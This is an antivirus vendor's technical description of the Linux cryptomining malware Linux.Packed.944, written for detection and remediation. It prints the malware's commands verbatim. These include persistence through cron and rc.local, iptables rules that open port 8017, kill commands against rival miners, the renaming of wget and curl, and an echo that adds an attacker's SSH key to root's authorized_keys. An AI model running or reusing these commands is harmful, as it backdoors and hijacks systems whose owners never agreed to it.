Linux.Packed.944

Added to the Dr.Web virus database: 2020-10-05

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /etc/rc.local
  • /etc/crontab
  • /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
  • /root/.ssh/authorized_keys
Modifies firewall settings:
  • iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
  • iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
  • iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Launches processes:
  • <SAMPLE_FULL_PATH> -deamon
  • sh -c ps -ef | grep Circle_MI | grep -v grep | awk '{print $2}' | xargs kill -9
  • ps -ef
  • grep -v grep
  • grep Circle_MI
  • awk {print $2}
  • xargs kill -9
  • kill -9
  • sh -c ps -ef | grep kworker34 | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep kworker34
  • sh -c ps -ef | grep .daemond | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep .daemond
  • sh -c ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /tmp/thisxxs
  • sh -c ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /opt/yilu/work/xig/xig
  • sh -c ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /opt/yilu/mservice
  • sh -c ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /usr/bin/.sshd
  • sh -c ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep /usr/bin/bsd-port/getty
  • sh -c ps -ef | grep x86_ | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep x86_
  • sh -c ps -ef | grep cryptonight | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep cryptonight
  • sh -c ps -ef | grep ddg | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep ddg
  • sh -c ps -ef | grep prohash | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep prohash
  • sh -c ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep monero
  • sh -c ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep xmr
  • sh -c ps -ef | grep miner | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep miner
  • sh -c ps -ef | grep pool. | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep pool.
  • sh -c ps -ef | grep tcp: | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep tcp:
  • sh -c ps -ef | grep stratum | grep -v grep | awk '{print $2}' | xargs kill -9
  • grep stratum
  • sh -c killall xmr
  • sh -c mv /usr/bin/wget /usr/bin/wget1&
  • mv /usr/bin/wget /usr/bin/wget1
  • sh -c mv /usr/bin/curl /usr/bin/curl1&
  • mv /usr/bin/curl /usr/bin/curl1
  • sh -c chmod +x /tmp/xmr
  • chmod +x /tmp/xmr
  • sh -c /tmp/xmr
  • /tmp/xmr
  • sh -c chmod +x /tmp/secure.sh
  • chmod +x /tmp/secure.sh
  • sh -c /tmp/secure.sh&
  • /tmp/secure.sh
  • sh -c chmod +x /tmp/auth.sh
  • chmod +x /tmp/auth.sh
  • sh -c /tmp/auth.sh&
  • date +%b %e %H
  • /tmp/auth.sh
  • sh -c mkdir -p /usr/.work
  • grep Oct 5 17 /var/log/secure
  • grep Failed
  • sort
  • awk {print $(NF-3)}
  • uniq -c
  • awk $1>\"$LIMIT\"{print $1\":\"$2}
  • mkdir -p /usr/.work
  • sh -c \cp -R /root/* /usr/.work/ &
  • sleep 60
  • grep Oct 5 17 /var/log/auth.log
  • sh -c mkdir -p /root/.ssh
  • cp -R <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /usr/.work/
  • mkdir -p /root/.ssh
  • sh -c chmod 700 /root/.ssh/
  • chmod 700 /root/.ssh/
  • sh -c echo >> /root/.ssh/authorized_keys
  • sh -c chmod 600 /root/.ssh/authorized_keys
  • chmod 600 /root/.ssh/authorized_keys
  • sh -c echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys
  • sh -c iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
  • sh -c iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
  • sh -c iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Attempts to kill the following processes:
  • killall xmr
Performs operations with the file system:
Modifies file access rights:
  • /tmp/xmr
  • /tmp/secure.sh
  • /tmp/auth.sh
  • /root/.ssh
  • /root/.ssh/authorized_keys
Creates folders:
  • /usr/.work
  • /root/.ssh
Creates or modifies files:
  • /tmp/config.json
  • /tmp/xmr
  • /usr/bin/wget
  • /tmp/secure.sh
  • /tmp/auth.sh
  • /usr/.work/<SAMPLE>
  • /usr/.work/run.sh
  • /usr/.work/stdout.log
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:14747
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 16#.###.226.137:6666
DNS ASK:
  • xm#.##ypto-pool.fr
Sends data to the following servers:
  • 16#.###.226.137:6666
Receives data from the following servers:
  • 16#.###.226.137:6666
Other:
Collects CPU information
Collects RAM information
Collects information about network activity

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.